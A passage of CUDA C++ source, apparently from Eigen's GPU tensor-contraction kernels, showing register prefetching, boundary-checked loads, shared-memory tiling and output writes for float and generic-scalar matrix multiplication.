output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 2) = val2;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 3) = val3;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 4) = val4;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 5) = val5;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 6) = val6;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 7) = val7;
} else {
#pragma unroll 7
for (int j = 0; j < max_j_write; j++) {
Scalar val = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * j];
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * j) = val;
}
}
}
#undef res
}
template<typename Scalar, typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper>
__global__ void
__launch_bounds__(512)
EigenContractionKernel(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output,
const Index m_size, const Index n_size, const Index k_size) {
__shared__ Scalar lhs_shmem[72 * 64];
__shared__ Scalar rhs_shmem[72 * 64];
const Index m_block_idx = blockIdx.x;
const Index n_block_idx = blockIdx.y;
const Index base_m = 64 * m_block_idx;
const Index base_n = 64 * n_block_idx;
if (base_m + 63 < m_size && base_n + 63 < n_size) {
EigenContractionKernelInternal<Scalar, Index, LhsMapper, RhsMapper, OutputMapper, false>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size);
} else {
EigenContractionKernelInternal<Scalar, Index, LhsMapper, RhsMapper, OutputMapper, true>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size);
}
}
template<typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper, bool CHECK_LHS_BOUNDARY,
bool CHECK_RHS_BOUNDARY>
__device__ EIGEN_STRONG_INLINE void
EigenFloatContractionKernelInternal16x16(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output, float2 lhs_shmem2[][16],
float2 rhs_shmem2[][8], const Index m_size,
const Index n_size, const Index k_size,
const Index base_m, const Index base_n) {
typedef float Scalar;
// prefetch registers
float4 lhs_pf0, rhs_pf0;
float4 results[4];
for (int i=0; i < 4; i++) {
results[i].x = results[i].y = results[i].z = results[i].w = 0;
}
#define prefetch_lhs(reg, row, col) \
if (!CHECK_LHS_BOUNDARY) { \
if (col < k_size) { \
reg =lhs.loadPacket<Unaligned>(row, col); \
} \
} else { \
if (col < k_size) { \
if (row + 3 < m_size) { \
reg =lhs.loadPacket<Unaligned>(row, col); \
} else if (row + 2 < m_size) { \
reg.x =lhs(row + 0, col); \
reg.y =lhs(row + 1, col); \
reg.z =lhs(row + 2, col); \
} else if (row + 1 < m_size) { \
reg.x =lhs(row + 0, col); \
reg.y =lhs(row + 1, col); \
} else if (row < m_size) { \
reg.x =lhs(row + 0, col); \
} \
} \
}
Index lhs_vert = base_m+threadIdx.x*4;
for (Index k = 0; k < k_size; k += 16) {
lhs_pf0 = internal::pset1<float4>(0);
rhs_pf0 = internal::pset1<float4>(0);
Index lhs_horiz = threadIdx.y+k;
prefetch_lhs(lhs_pf0, lhs_vert, lhs_horiz)
Index rhs_vert = k+(threadIdx.x%4)*4;
Index rhs_horiz0 = (threadIdx.x>>2)+threadIdx.y*4+base_n;
if (!CHECK_RHS_BOUNDARY) {
if ((rhs_vert + 3) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
} else if (rhs_vert + 2 < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
} else if (rhs_vert + 1 < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
} else if (rhs_vert < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
}
} else {
if (rhs_horiz0 < n_size) {
if ((rhs_vert + 3) < k_size) {
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
} else if ((rhs_vert + 2) < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
} else if ((rhs_vert + 1) < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
} else if (rhs_vert < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
}
}
}
float x1, x2;
// the following can be a bitwise operation... some day.
if((threadIdx.x%8) < 4) {
x1 = rhs_pf0.y;
x2 = rhs_pf0.w;
} else {
x1 = rhs_pf0.x;
x2 = rhs_pf0.z;
}
x1 = __shfl_xor(x1, 4);
x2 = __shfl_xor(x2, 4);
if((threadIdx.x%8) < 4) {
rhs_pf0.y = x1;
rhs_pf0.w = x2;
} else {
rhs_pf0.x = x1;
rhs_pf0.z = x2;
}
// We have 64 features.
// Row 0 -> times (0, 4, 8, 12, 1, 5, 9, 13) for features 0, 1.
// Row 1 -> times (0, 4, 8, 12, 1, 5, 9, 13) for features 2, 3.
// ...
// Row 31 -> times (0, 4, 8, 12, 1, 5, 9, 13) for features 62, 63
// Row 32 -> times (2, 6, 10, 14, 3, 7, 11, 15) for features 0, 1
// ...
rhs_shmem2[(threadIdx.x>>3)+ threadIdx.y*2][threadIdx.x%8] = make_float2(rhs_pf0.x, rhs_pf0.y);
rhs_shmem2[(threadIdx.x>>3)+ threadIdx.y*2+32][threadIdx.x%8] = make_float2(rhs_pf0.z, rhs_pf0.w);
// Row 0 (time 0) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61)
// Row 1 (time 1) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61)
// ...
// Row 15 (time 15) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61)
// Row 16 (time 0) -> features (2, 3), (6, 7), .. (30, 31), (34, 35), .. (62, 63)
// ...
lhs_shmem2[threadIdx.y][threadIdx.x] = make_float2(lhs_pf0.x, lhs_pf0.y);
lhs_shmem2[threadIdx.y+16][threadIdx.x] = make_float2(lhs_pf0.z, lhs_pf0.w);
#define add_vals(fl1, fl2, fr1, fr2)\
results[0].x += fl1.x * fr1.x;\
results[0].y += fl1.y * fr1.x;\
results[0].z += fl2.x * fr1.x;\
results[0].w += fl2.y * fr1.x;\
\
results[1].x += fl1.x * fr1.y;\
results[1].y += fl1.y * fr1.y;\
results[1].z += fl2.x * fr1.y;\
results[1].w += fl2.y * fr1.y;\
\
results[2].x += fl1.x * fr2.x;\
results[2].y += fl1.y * fr2.x;\
results[2].z += fl2.x * fr2.x;\
results[2].w += fl2.y * fr2.x;\
\
results[3].x += fl1.x * fr2.y;\
results[3].y += fl1.y * fr2.y;\
results[3].z += fl2.x * fr2.y;\
results[3].w += fl2.y * fr2.y;
__syncthreads();
// Do the multiplies.
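// Editorial worked example of the shared-memory indexing below: for
// threadIdx.y = 3 and koff = 5, start_feature = 12, so fr1 reads
// rhs_shmem2[6 + 32*((5%4)/2)][5/4 + (5%2)*4] = rhs_shmem2[6][5] (integer
// division throughout), i.e. the float2 holding features 12 and 13 for the
// time step selected by koff.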
#pragma unroll
for (int koff = 0; koff < 16; koff ++) {
// 32 x threads.
float2 fl1 = lhs_shmem2[koff][threadIdx.x];
float2 fl2 = lhs_shmem2[koff + 16][threadIdx.x];
int start_feature = threadIdx.y * 4;
float2 fr1 = rhs_shmem2[(start_feature>>1) + 32*((koff%4)/2)][koff/4 + (koff%2)*4];
float2 fr2 = rhs_shmem2[(start_feature>>1) + 1 + 32*((koff%4)/2)][koff/4 + (koff%2)*4];
add_vals(fl1, fl2, fr1, fr2)
}
__syncthreads();
}
#undef prefetch_lhs
#undef add_vals
Index horiz_base = threadIdx.y*4+base_n;
if (!CHECK_LHS_BOUNDARY && !CHECK_RHS_BOUNDARY) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
} else if (!CHECK_RHS_BOUNDARY) {
// CHECK LHS
if (lhs_vert + 3 < m_size) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
} else if (lhs_vert + 2 < m_size) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
}
} else if (lhs_vert + 1 < m_size) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
}
} else if (lhs_vert < m_size) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
}
}
} else if (!CHECK_LHS_BOUNDARY) {
// CHECK RHS
/*
int ncols_rem = fminf(n_size- horiz_base, 4);
for (int i = 0; i < ncols_rem; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}*/
for (int i = 0; i < 4; i++) {
if (horiz_base+i < n_size) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
}
} else {
// CHECK both boundaries.
for (int i = 0; i < 4; i++) {
if (horiz_base+i < n_size) {
if (lhs_vert < m_size)
output(lhs_vert, horiz_base + i) = results[i].x;
if (lhs_vert + 1 < m_size)
output(lhs_vert + 1, horiz_base + i) = results[i].y;
if (lhs_vert + 2 < m_size)
output(lhs_vert + 2, horiz_base + i) = results[i].z;
if (lhs_vert + 3 < m_size)
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
}
}
}
template<typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper, bool CHECK_LHS_BOUNDARY,
bool CHECK_RHS_BOUNDARY>
__device__ EIGEN_STRONG_INLINE void
EigenFloatContractionKernelInternal(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output, float2 lhs_shmem2[][32],
float2 rhs_shmem2[][8], const Index m_size,
const Index n_size, const Index k_size,
const Index base_m, const Index base_n) {
typedef float Scalar;
// prefetch registers
float4 lhs_pf0, lhs_pf1, lhs_pf2, lhs_pf3;
float4 rhs_pf0, rhs_pf1;
float4 results[8];
for (int i=0; i < 8; i++) {
results[i].x = results[i].y = results[i].z = results[i].w = 0;
}
Index lhs_vert = base_m+threadIdx.x*4+(threadIdx.y%4)*32;
for (Index k = 0; k < k_size; k += 32) {
lhs_pf0 = internal::pset1<float4>(0);
lhs_pf1 = internal::pset1<float4>(0);
lhs_pf2 = internal::pset1<float4>(0);
lhs_pf3 = internal::pset1<float4>(0);
rhs_pf0 = internal::pset1<float4>(0);
rhs_pf1 = internal::pset1<float4>(0);
if (!CHECK_LHS_BOUNDARY) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
lhs_pf2 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+16));
lhs_pf3 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
lhs_pf2 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
}
} else {
// just CHECK_LHS_BOUNDARY
if (lhs_vert + 3 < m_size) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
lhs_pf2 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+16));
lhs_pf3 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
lhs_pf2 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
}
} else if (lhs_vert + 2 < m_size) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf0.z =lhs(lhs_vert + 2, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf1.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf2.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+16));
lhs_pf2.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+16));
lhs_pf3.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+24));
lhs_pf3.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+24));
lhs_pf3.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf0.z =lhs(lhs_vert + 2, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf1.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf2.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+16));
lhs_pf2.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf0.z =lhs(lhs_vert + 2, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf1.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf0.z =lhs(lhs_vert + 2, (threadIdx.y/4+k));
}
} else if (lhs_vert + 1 < m_size) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf2.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+16));
lhs_pf3.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+24));
lhs_pf3.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf2.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
}
} else if (lhs_vert < m_size) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf3.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
}
}
}
__syncthreads();
Index rhs_vert = k+threadIdx.x*4;
Index rhs_horiz0 = threadIdx.y*2+base_n;
Index rhs_horiz1 = threadIdx.y*2+1+base_n;
if (!CHECK_RHS_BOUNDARY) {
if ((rhs_vert + 3) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
rhs_pf1 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz1);
} else if (rhs_vert + 2 < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
rhs_pf1.y = rhs(rhs_vert + 1, rhs_horiz1);
rhs_pf1.z = rhs(rhs_vert + 2, rhs_horiz1);
} else if (rhs_vert + 1 < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
rhs_pf1.y = rhs(rhs_vert + 1, rhs_horiz1);
} else if (rhs_vert < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
}
} else {
if (rhs_horiz1 < n_size) {
if ((rhs_vert + 3) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
rhs_pf1 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz1);
} else if (rhs_vert + 2 < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
rhs_pf1.y = rhs(rhs_vert + 1, rhs_horiz1);
rhs_pf1.z = rhs(rhs_vert + 2, rhs_horiz1);
} else if (k+threadIdx.x*4 + 1 < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
rhs_pf1.y = rhs(rhs_vert + 1, rhs_horiz1);
} else if (k+threadIdx.x*4 < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
}
} else if (rhs_horiz0 < n_size) {
if ((rhs_vert + 3) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
} else if ((rhs_vert + 2) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
} else if ((rhs_vert + 1) < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
} else if (rhs_vert < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
}
}
}
__syncthreads();
// Loaded. Do computation
// Row 0 -> times (0, 4, 8, .. 28) for features 0, 1.
// Row 1 -> times (0, 4, 8, .. 28) for features 2, 3.
// ..
// Row 31 -> times (0, 4, 8, .. 28) for features 62, 63
rhs_shmem2[threadIdx.y][threadIdx.x] = make_float2(rhs_pf0.x, rhs_pf1.x);
// Row 32 -> times (1, 5, 9, .. 29) for features 0, 1.
// Row 33 -> times (1, 5, 9, .. 29) for features 2, 3.
// ..
rhs_shmem2[threadIdx.y+32][threadIdx.x] = make_float2(rhs_pf0.y, rhs_pf1.y);
// Row 64 -> times (2, 6, 10, .. 30) for features 0, 1.
// Row 65 -> times (2, 6, 10, .. 30) for features 2, 3.
rhs_shmem2[threadIdx.y+64][threadIdx.x] = make_float2(rhs_pf0.z, rhs_pf1.z);
// Row 96 -> times (3, 7, 11, .. 31) for features 0, 1.
// Row 97 -> times (3, 7, 11, .. 31) for features 2, 3.
rhs_shmem2[threadIdx.y+96][threadIdx.x] = make_float2(rhs_pf0.w, rhs_pf1.w);
// LHS.
// Row 0 (time 0) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61) .. (124, 125)
// Row 1 (time 1) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61) .. (124, 125)
// ...
// Row 8 (time 0) -> features (2, 3), (6, 7), .. (30, 31), (34, 35), .. (62, 63) .. (126, 127)
// Row 15 (time 7) -> features (2, 3), (6, 7), .. (30, 31), (34, 35), .. (62, 63) .. (126, 127)
#define add_vals(a_feat1, a_feat2, f1, f2, f3, f4)\
results[0].x += a_feat1.x * f1.x;\
results[1].x += a_feat1.x * f1.y;\
results[2].x += a_feat1.x * f2.x;\
results[3].x += a_feat1.x * f2.y;\
results[4].x += a_feat1.x * f3.x;\
results[5].x += a_feat1.x * f3.y;\
results[6].x += a_feat1.x * f4.x;\
results[7].x += a_feat1.x * f4.y;\
\
results[0].y += a_feat1.y * f1.x;\
results[1].y += a_feat1.y * f1.y;\
results[2].y += a_feat1.y * f2.x;\
results[3].y += a_feat1.y * f2.y;\
results[4].y += a_feat1.y * f3.x;\
results[5].y += a_feat1.y * f3.y;\
results[6].y += a_feat1.y * f4.x;\
results[7].y += a_feat1.y * f4.y;\
\
results[0].z += a_feat2.x * f1.x;\
results[1].z += a_feat2.x * f1.y;\
results[2].z += a_feat2.x * f2.x;\
results[3].z += a_feat2.x * f2.y;\
results[4].z += a_feat2.x * f3.x;\
results[5].z += a_feat2.x * f3.y;\
results[6].z += a_feat2.x * f4.x;\
results[7].z += a_feat2.x * f4.y;\
\
results[0].w += a_feat2.y * f1.x;\
results[1].w += a_feat2.y * f1.y;\
results[2].w += a_feat2.y * f2.x;\
results[3].w += a_feat2.y * f2.y;\
results[4].w += a_feat2.y * f3.x;\
results[5].w += a_feat2.y * f3.y;\
results[6].w += a_feat2.y * f4.x;\
results[7].w += a_feat2.y * f4.y;
lhs_shmem2[threadIdx.y/4][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf0.x, lhs_pf0.y);
lhs_shmem2[threadIdx.y/4+8][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf1.x, lhs_pf1.y);
lhs_shmem2[threadIdx.y/4+16][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf2.x, lhs_pf2.y);
lhs_shmem2[threadIdx.y/4+24][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf3.x, lhs_pf3.y);
lhs_shmem2[threadIdx.y/4 + 32][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf0.z, lhs_pf0.w);
lhs_shmem2[threadIdx.y/4 + 40][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf1.z, lhs_pf1.w);
lhs_shmem2[threadIdx.y/4 + 48][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf2.z, lhs_pf2.w);
lhs_shmem2[threadIdx.y/4 + 56][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf3.z, lhs_pf3.w);
__syncthreads();
// Do the multiplies.
#pragma unroll
for (int koff = 0; koff < 32; koff ++) {
float2 a3 = lhs_shmem2[koff][threadIdx.x + (threadIdx.y % 4) * 8];
float2 a4 = lhs_shmem2[koff + 32][threadIdx.x + (threadIdx.y % 4) * 8];
// first feature is at (threadIdx.y/4) * 8; last is at start + 8.
int start_feature = (threadIdx.y / 4) * 8;
float2 br1 = rhs_shmem2[start_feature/2 + (koff % 4) * 32][koff/4];
float2 br2 = rhs_shmem2[start_feature/2 + 1 + (koff % 4) * 32][koff/4];
float2 br3 = rhs_shmem2[start_feature/2 + 2 + (koff % 4) * 32][koff/4];
float2 br4 = rhs_shmem2[start_feature/2 + 3 + (koff % 4) * 32][koff/4];
add_vals(a3, a4, br1, br2, br3, br4)
}
__syncthreads();
} // end loop over k
__syncthreads();
Index horiz_base = (threadIdx.y/4)*8+base_n;
if (!CHECK_LHS_BOUNDARY && !CHECK_RHS_BOUNDARY) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
} else if (!CHECK_RHS_BOUNDARY) {
if (lhs_vert + 3 < m_size) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
} else if (lhs_vert + 2 < m_size) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
}
} else if (lhs_vert + 1 < m_size) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
}
} else if (lhs_vert < m_size) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
}
}
} else if (!CHECK_LHS_BOUNDARY) {
// CHECK RHS boundary only
for (int i = 0; i < 8; i++) {
if (horiz_base + i < n_size) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
}
} else {
// CHECK both boundaries.
for (int i = 0; i < 8; i++) {
if (horiz_base + i < n_size) {
if (lhs_vert < m_size)
output(lhs_vert, horiz_base + i) = results[i].x;
if (lhs_vert + 1 < m_size)
output(lhs_vert + 1, horiz_base + i) = results[i].y;
